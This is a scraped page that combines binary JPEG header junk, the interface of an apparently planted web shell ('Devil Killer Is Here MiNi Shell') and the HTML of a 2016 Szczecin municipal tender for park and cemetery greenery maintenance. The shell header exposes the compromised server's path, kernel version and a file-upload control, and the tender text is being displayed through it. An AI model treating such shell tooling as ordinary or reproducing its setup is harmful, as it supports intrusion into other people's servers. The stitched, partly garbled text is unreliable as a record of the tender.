JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160607/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160607/72789-N-2016.html

<p class="kh_header"><b>Szczecin: Konserwacja i utrzymanie zieleni (w podziale na części), tj.:
część I - konserwacja i utrzymanie zieleni miejskiej w Szczecinie (parki, zieleńce i pasy drogowe) - rejon III
część II - konserwacja i utrzymanie zieleni na terenie Cmentarza Centralnego w Szczecinie</b><br>
<b>Numer ogłoszenia: 72789 - 2016; data zamieszczenia: 07.06.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zakład Usług Komunalnych , ul. Ku Słońcu 125a, 71-080 Szczecin, woj. zachodniopomorskie, tel. 91 484 82 94, faks 91 484 80 55.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.zuk.szczecin.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Konserwacja i utrzymanie zieleni (w podziale na części), tj.:
część I - konserwacja i utrzymanie zieleni miejskiej w Szczecinie (parki, zieleńce i pasy drogowe) - rejon III
część II - konserwacja i utrzymanie zieleni na terenie Cmentarza Centralnego w Szczecinie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest: Konserwacja i utrzymanie zieleni (w podziale na części), tj.:

część I - konserwacja i utrzymanie zieleni miejskiej w Szczecinie (parki, zieleńce
i pasy drogowe) - rejon III

część II - konserwacja i utrzymanie zieleni na terenie Cmentarza Centralnego
w Szczecinie

 

Część I:

(Zamawiający działa w imieniu własnym i na rzecz Zarządu Dróg i Transportu Miejskiego w Szczecinie zgodnie z art. 16 ust. 4 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych - t.j. Dz. U. z 2015 r. poz. 2164)

      Konserwacja i utrzymanie zieleni miejskiej w Szczecinie (parki, zieleńce i pasy drogowe) - rejon III

 

CPV:

77310000-6  Usługi sadzenia roślin i utrzymania terenów zielonych

 

2.  Przedmiot zamówienia został szczegółowo określony w załącznikach nr 10/I - 14/I
do SIWZ.

3.   Wykonawca wykona przedmiot zamówienia zgodnie z zasadami współczesnej wiedzy technicznej, obowiązującymi normami, przepisami prawa powszechnie obowiązującego, m. in. ustawą z dnia 14 grudnia 2012 r. o odpadach (Dz.U. z 2013 r. poz. 21), ustawą
z dnia 27 kwietnia 2001 r. Prawo ochrony środowiska (t.j. Dz.U. z 2013 r. poz. 1232
ze zmianami), ustawą z dnia 16 kwietnia 2004 r. o ochronie przyrody (t.j. Dz.U. z 2013 r. poz. 627 ze zmianami), ustawą z dnia 13 września 1996 r. o utrzymaniu czystości
i porządku w gminach (t.j. Dz.U. z 2013 r. poz. 1399 ze zmianami) oraz z zapisami Specyfikacji Istotnych Warunków Zamówienia i ofertą, które będą stanowiły integralną część umowy.

4. Zamawiający przewiduje możliwość dokonania zmian postanowień zawartej umowy
w stosunku do treści oferty w przypadku:

1)      niewykorzystania środków wynikających z maksymalnego wynagrodzenia kosztorysowego Wykonawcy za konserwację i utrzymanie zieleni miejskiej w parkach i zieleńcach lub za konserwację i utrzymanie zieleni miejskiej w pasach drogowych. Zamawiający wówczas ma prawo przesunięcia pozostałej kwoty na poczet konserwacji i utrzymania zieleni miejskiej w parkach i zieleńcach lub na poczet konserwacji i utrzymania zieleni miejskiej w pasach drogowych. W takim przypadku na uzasadniony wniosek Zamawiającego zmiana zostanie wprowadzona aneksem do umowy.

6. Zmiana umowy nastąpić może z inicjatywy Zamawiającego albo Wykonawcy poprzez przedstawienie drugiej stronie propozycji zmian w formie pisemnej, które powinny zawierać:

1) opis zmiany,

2)  uzasadnienie zmiany,

3)  koszt zmiany oraz jego wpływ na wysokość wynagrodzenia,

4)  czas wykonania zmiany oraz wpływ zmiany na termin zakończenia umowy.

 

Część II:

      Konserwacja i utrzymanie zieleni na terenie Cmentarza Centralnego w Szczecinie.

     

1.    Zakres przedmiotu zamówienia został szczegółowo określony w załącznikach 10/II, 13/II, 14/II do SIWZ.

2.    Grobownictwo wojenne obejmują następujące obiekty:

-        Kwatera Wojenna Żołnierzy Wojska Polskiego i Armii Radzieckiej,

-        Mogiła zbiorowa żołnierzy Bojowego Oddziału Armii (formacji podziemia niepodległościowego),

-        Kwatera Wojenna Jeńców Belgijskich oraz Jeńców Wojska Polskiego,

-        Cmentarz Jeńców Francuskich przy ul. Litewskiej,

-        Mogiła zbiorowa na Cmentarzu Komunalnym w Dąbiu.

3.    Zamawiający informuje, że Cmentarz Centralny wpisany jest do rejestru zabytków pod numerem 1066 na podstawie decyzji z dnia 16 czerwca 1985 r. Wojewódzkiego Konserwatora Zabytków (L.dz. KL.III.5340/10/85). Ochronie podlega układ przestrzenny, ciągi komunikacyjne, infrastruktura techniczna, mała architektura oraz zieleń niska i wysoka.

4.    Ze względu na rosnący na Cmentarzu Centralnym cenny drzewostan zabrania się poruszania ciężkimi, wielotonowymi (z wysokimi burtami) pojazdami, które narażałyby konary oraz gałęzie drzew na uszkodzenie, a nawierzchnie alejek na dewastacje.

5.    Wykonawca wykona przedmiot zamówienia zgodnie z zasadami współczesnej wiedzy technicznej, obowiązującymi normami, przepisami prawa powszechnie obowiązującego, m. in. ustawą z dnia 14 grudnia 2012 r. o odpadach (Dz.U. z 2013 r. poz. 21), ustawą z dnia 27 kwietnia 2001 r. Prawo ochrony środowiska (t.j. Dz.U. z 2013 r. poz. 1232 ze zmianami), ustawą z dnia 16 kwietnia 2004 r. o ochronie przyrody (t.j. Dz.U. z 2013 r. poz. 627 ze zmianami), ustawą z dnia 13 września 1996 r. o utrzymaniu czystości i porządku w gminach (t.j. Dz.U. z 2013 r. poz. 1399 ze zmianami) oraz z zapisami Specyfikacji Istotnych Warunków Zamówienia i ofertą, które będą stanowiły integralną część umowy.

 

CPV:

77310000-6  Usługi sadzenia roślin i utrzymania terenów zielonych

77211500-2  Usługi pielęgnacji drzew.</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 77.31.00.00-6, 77.21.15.00-2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.12.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Opis sposobu dokonywania oceny spełniania warunku:

- dot. części I:

Warunek zostanie uznany za spełniony, jeżeli Wykonawca wykaże, że 
wykonuje lub wykonał należycie w okresie ostatnich trzech lat przed 
upływem terminu składania ofert, a jeżeli okres prowadzenia działalności 
jest krótszy - w tym okresie, co najmniej dwie główne usługi, polegające 
na pracach przy pielęgnacji zieleni miejskiej, obejmujące przynajmniej 
zabiegi koszenia trawników, pielęgnacji krzewów o łącznej wartości nie 
mniejszej niż 100 000,00 zł brutto, do dnia, w którym upływa termin 
składania ofert.



-     dot. części II:

Warunek zostanie uznany za spełniony, jeżeli Wykonawca wykaże, że 
wykonuje lub wykonał należycie w okresie ostatnich trzech lat przed 
upływem terminu składania ofert, a jeżeli okres prowadzenia działalności 
jest krótszy - w tym okresie, co najmniej pięć głównych usług, a mianowicie:

a)    co najmniej dwie usługi polegające na pracach w drzewostanie 
miejskim lub parkowym, o łącznej wartości nie mniejszej niż 100 000,00 
zł brutto, do dnia
w którym upływa termin składania ofert

oraz

b)   co najmniej dwie usługi polegające na pracach przy pielęgnacji 
zieleni miejskiej (obejmujące m.in. zabiegi koszenia trawników) o 
łącznej wartości nie mniejszej niż 100 000,00 zł brutto, do dnia w 
którym upływa termin składania ofert,

oraz

c)    co najmniej jedną usługę polegającą na cięciu żywopłotów, o 
wartości nie mniejszej niż 25 000,00 zł brutto, do dnia w którym upływa 
termin składania ofert.



W przypadku składania przez Wykonawcę oferty na więcej niż jedną część, 
Zamawiający dopuszcza możliwość łącznego spełniania ww. warunku, co 
oznacza możliwość wykazania tych samych usług, czyli, że warunek ten nie 
musi być spełniony odrębnie dla każdej części, na którą Wykonawca składa 
ofertę.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dot. części II:
Warunek zostanie uznany za spełniony, jeżeli Wykonawca wykaże, że dysponuje lub będzie dysponować co najmniej:
a) 2 pojazdami przystosowanymi do zbierania odpadów pochodzących z pielęgnacji zieleni
b) 2 kosiarkami samojezdnymi lub ciągnikowymi
c) 5 kosiarkami ręcznymi z koszem zbierającym
d) 5 wykaszarkami
e) 3 pilarkami spalinowymi
f) 1 rębakiem do gałęzi
g) 1 podnośnikiem do 20 m wysokości
h) 1 podnośnikiem do 30 m wysokości</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Opis sposobu dokonywania oceny spełniania warunku:

A. odnośnie osób zdolnych do wykonania zamówienia:



- dot. części I:

Warunek zostanie uznany za spełniony, jeżeli Wykonawca wykaże, że 
dysponuje lub będzie dysponować co najmniej:

             a) kierownikiem robót - osobą posiadającą wykształcenie 
wyższe o kierunku
                 ogrodnictwo lub rolnictwo, lub architektura krajobrazu, 
lub leśnictwo, lub technika
                 rolna i leśna, lub ochrona środowiska oraz posiadającą 
minimum 3-letnią praktykę
                 w zakresie pielęgnacji zieleni

             oraz

b)  3 osobami posiadającymi wykształcenie minimum zawodowe o kierunku   
ogrodniczym, rolniczym lub leśnym albo posiadającymi minimum 2 - letnią  
praktykę w zakresie utrzymania terenów zieleni,

            oraz

             c)  3 osobami  obsługującymi kosiarki i wykaszarki, 
posiadających minimum 2 - letnią praktykę w zakresie utrzymania terenów 
zieleni,



-     dot. części II:
Warunek zostanie uznany za spełniony, jeżeli Wykonawca wykaże, że 
dysponuje lub będzie dysponować co najmniej:

a) kierownikiem robót - osobą posiadającą wykształcenie wyższe o 
kierunku ogrodnictwo lub rolnictwo, lub architektura krajobrazu, lub 
leśnictwo, lub technika
rolna i leśna, lub ochrona środowiska oraz posiadającą minimum 3-letnią 
praktykę
w zakresie pielęgnacji zieleni

            oraz

b) 3 osobami posiadającymi wykształcenie minimum zawodowe o kierunku
       ogrodniczym, rolniczym lub leśnym albo posiadającymi minimum 2 - 
letnią
       praktykę w zakresie utrzymania terenów zieleni,

oraz

c)  3 osobami  obsługującymi kosiarki i wykaszarki, posiadających 
minimum 2 - letnią
     praktykę w zakresie utrzymania terenów zieleni,

oraz

  d) 3 pilarzami posiadającymi uprawnienia uzyskane po ukończeniu kursu, 
szkolenia
       lub szkoły w zakresie pielęgnacji/cięć drzew ozdobnych.



W przypadku składania przez Wykonawcę oferty na więcej niż jedną część, 
Zamawiający nie dopuszcza możliwości łącznego spełniania ww. warunku, co 
oznacza, że Wykonawca jest zobowiązany wykazać dysponowanie osobami 
odrębnie dla każdej części, na którą składa ofertę (ta sama osoba nie 
może zostać wykazana w kilku częściach),</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Ponadto wykonawcy mają dołączyć do oferty następujące dokumenty:
- dot. części I i II:
       1)  ofertę cenową - zgodnie z rozdziałem I pkt 3 SIWZ;
 	W przypadku składania oferty wspólnej należy złożyć jedną ofertę cenową;
         2) 	odpowiednie pełnomocnictwa;  
	Tylko w sytuacjach określonych w rozdziale I pkt 5 zdanie drugie SIWZ lub 
	w przypadku składania oferty wspólnej (rozdział III pkt 1 SIWZ); 
       3)	oświadczenie według wzoru stanowiącego załącznik nr 1 do SIWZ, wskazujące cześć 	zamówienia, której wykonanie wykonawca powierzy podwykonawcom (jeżeli 	wykonawca przewiduje udział podwykonawców);
    W przypadku składania oferty wspólnej należy złożyć jedno oświadczenie,
4) kosztorys ofertowy: zgodnie z załącznikiem nr 10/I, 10/II do SIWZ - sporządzony według wzoru stanowiącego odpowiednio załącznik nr 14/I, 14/II do SIWZ;
           W przypadku składania oferty wspólnej należy złożyć jeden dokument.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - Termin płatności - 5</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>dot. części I
1. Zamawiający przewiduje możliwość dokonania zmian postanowień zawartej umowy w stosunku do treści oferty w przypadku:
1)	niewykorzystania środków wynikających z maksymalnego wynagrodzenia kosztorysowego Wykonawcy za konserwację i utrzymanie zieleni miejskiej w parkach i zieleńcach lub za konserwację i utrzymanie zieleni miejskiej w pasach drogowych. Zamawiający wówczas ma prawo przesunięcia pozostałej kwoty na poczet konserwacji i utrzymania zieleni miejskiej w parkach i zieleńcach lub na poczet konserwacji i utrzymania zieleni miejskiej w pasach drogowych. W takim przypadku na uzasadniony wniosek Zamawiającego zmiana zostanie wprowadzona aneksem do umowy.
2. Zmiana umowy nastąpić może z inicjatywy Zamawiającego albo Wykonawcy poprzez przedstawienie drugiej stronie propozycji zmian w formie pisemnej, które powinny zawierać:
1) opis zmiany,
2)  uzasadnienie zmiany,
3)  koszt zmiany oraz jego wpływ na wysokość wynagrodzenia,
4)  czas wykonania zmiany oraz wpływ zmiany na termin zakończenia umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.zuk.szczecin.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Siedziba Zamawiającego: ul. Ku Słońcu 125A, 71-080 Szczecin, pok. nr 1.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 15.06.2016 godzina 10:00, miejsce: Siedziba Zamawiającego: ul. Ku Słońcu 125A, 71-080 Szczecin, Sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 1. Zadanie nie dotyczy umowy ramowej.
2. Ocena spełniania warunków udziału w postępowaniu zostanie dokonana na zasadzie SPEŁNIA/NIE SPEŁNIA.
3. Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca 
w takiej sytuacji zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował tymi zasobami w trakcie realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia.
Ponadto zamawiający, w celu oceny, czy wykonawca będzie dysponował zasobami innych podmiotów w stopniu niezbędnym dla należytego wykonania zamówienia oraz  oceny, czy stosunek łączący Wykonawcę z tymi podmiotami gwarantuje rzeczywisty dostęp do ich zasobów, może żądać dokumentów dotyczących w szczególności:
1)	zakresu dostępnych wykonawcy zasobów innego podmiotu,
2)	sposobu wykorzystania zasobów innego podmiotu, przez Wykonawcę, przy wykonywaniu zamówienia,
3)	charakteru stosunku, jaki będzie łączył Wykonawcę z innym podmiotem,
4)	zakresu i okresu udziału innego podmiotu przy wykonywaniu zamówienia.
Przedkładane przez Wykonawcę kopie dokumentów dotyczących każdego z podmiotów, o których  mowa powyżej, musza być potwierdzone za zgodność z oryginałem przez te podmioty. 
4. Termin wykonania zamówienia: 
1)	część I - od dnia zawarcia umowy do dnia 15 grudnia 2016 r.
2)	część II - od dnia zawarcia umowy do dnia 15 grudnia 2016 r.
5. dot. części II - Wykonawca będzie zobowiązany do zakupu od Zamawiającego drewna, które pozyska w związku z realizacją przedmiotu zamówienia. W ofercie cenowej Wykonawca nie uwzględnia ceny za zakup drewna. Zamawiający za sprzedaż pozyskanego drewna będzie wystawiał faktury. Kwoty wynikające z ww. faktur (ustalone w oparciu o załącznik nr 13/II do SIWZ), będą potrącane z faktur - wystawianych odpowiednio przez Wykonawcę, na Zakład Usług Komunalnych, za realizację przedmiotu zamówienia.
6. Do dnia podpisania umowy, Wykonawca przedłoży Zamawiającemu (dotyczy części 
I i II):
       1)	zezwolenie na przetwarzanie odpadów lub umowę z podmiotem, który przejmie odpady do przetworzenia i posiada odpowiednie zezwolenie (zgodnie z ustawą z dnia 14 grudnia 2012 r. o odpadach Dz. U. z 2013 r. poz. 21 ze zm.),
2)  dowód wniesienia zabezpieczenia należytego wykonania umowy:
a)	Wykonawca, zobowiązany jest wnieść zabezpieczenie należytego wykonania umowy, w wysokości 5 % maksymalnej wartości nominalnej zobowiązania Zamawiającego wynikającego z umowy,
b)	zabezpieczenie należytego wykonania umowy będzie służyło pokryciu roszczeń 
z tytułu niewykonania lub nienależytego wykonania umowy,
c)	zabezpieczenie należytego wykonania umowy może być wniesione w: pieniądzu, poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej (z tym, że zobowiązanie kasy jest zawsze zobowiązaniem pieniężnym), gwarancjach bankowych, gwarancjach ubezpieczeniowych, poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości,
d)	jeżeli zabezpieczenie należytego wykonania umowy zostanie wniesione 
w pieniądzu zamawiający przechowa je na oprocentowanym rachunku bankowym,
e)	jeżeli zabezpieczenie należytego wykonania umowy zostanie wniesione 
w pieniądzu, zamawiający zwróci je wraz z odsetkami wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane pomniejszonym 
o koszty prowadzenia rachunku oraz prowizji bankowej za przelew pieniędzy 
na rachunek wykonawcy,
f)	zabezpieczenie może być wniesione w jednej lub kilku formach.
g)	w przypadku, gdy wykonawca wnosi zabezpieczenie w formie gwarancji bankowej lub gwarancji ubezpieczeniowej, z treści tych gwarancji musi 
w szczególności jednoznacznie wynikać:
A.	zobowiązanie gwaranta (banku, zakładu ubezpieczeń) do zapłaty 
do wysokości określonej w gwarancji kwoty, nieodwołalnie 
i bezwarunkowo, na pierwsze żądanie Zamawiającego zawierające oświadczenie (podpisane przez osoby upoważnione do składania oświadczeń woli w imieniu Beneficjenta), że zaistniały okoliczności związane z realizacją roszczenia Zamawiającego (z treści gwarancji musi wynikać, że oświadczenie dla swej skuteczności nie będzie wymagało spełnienia przez Zamawiającego dodatkowych wymogów formalnych), 
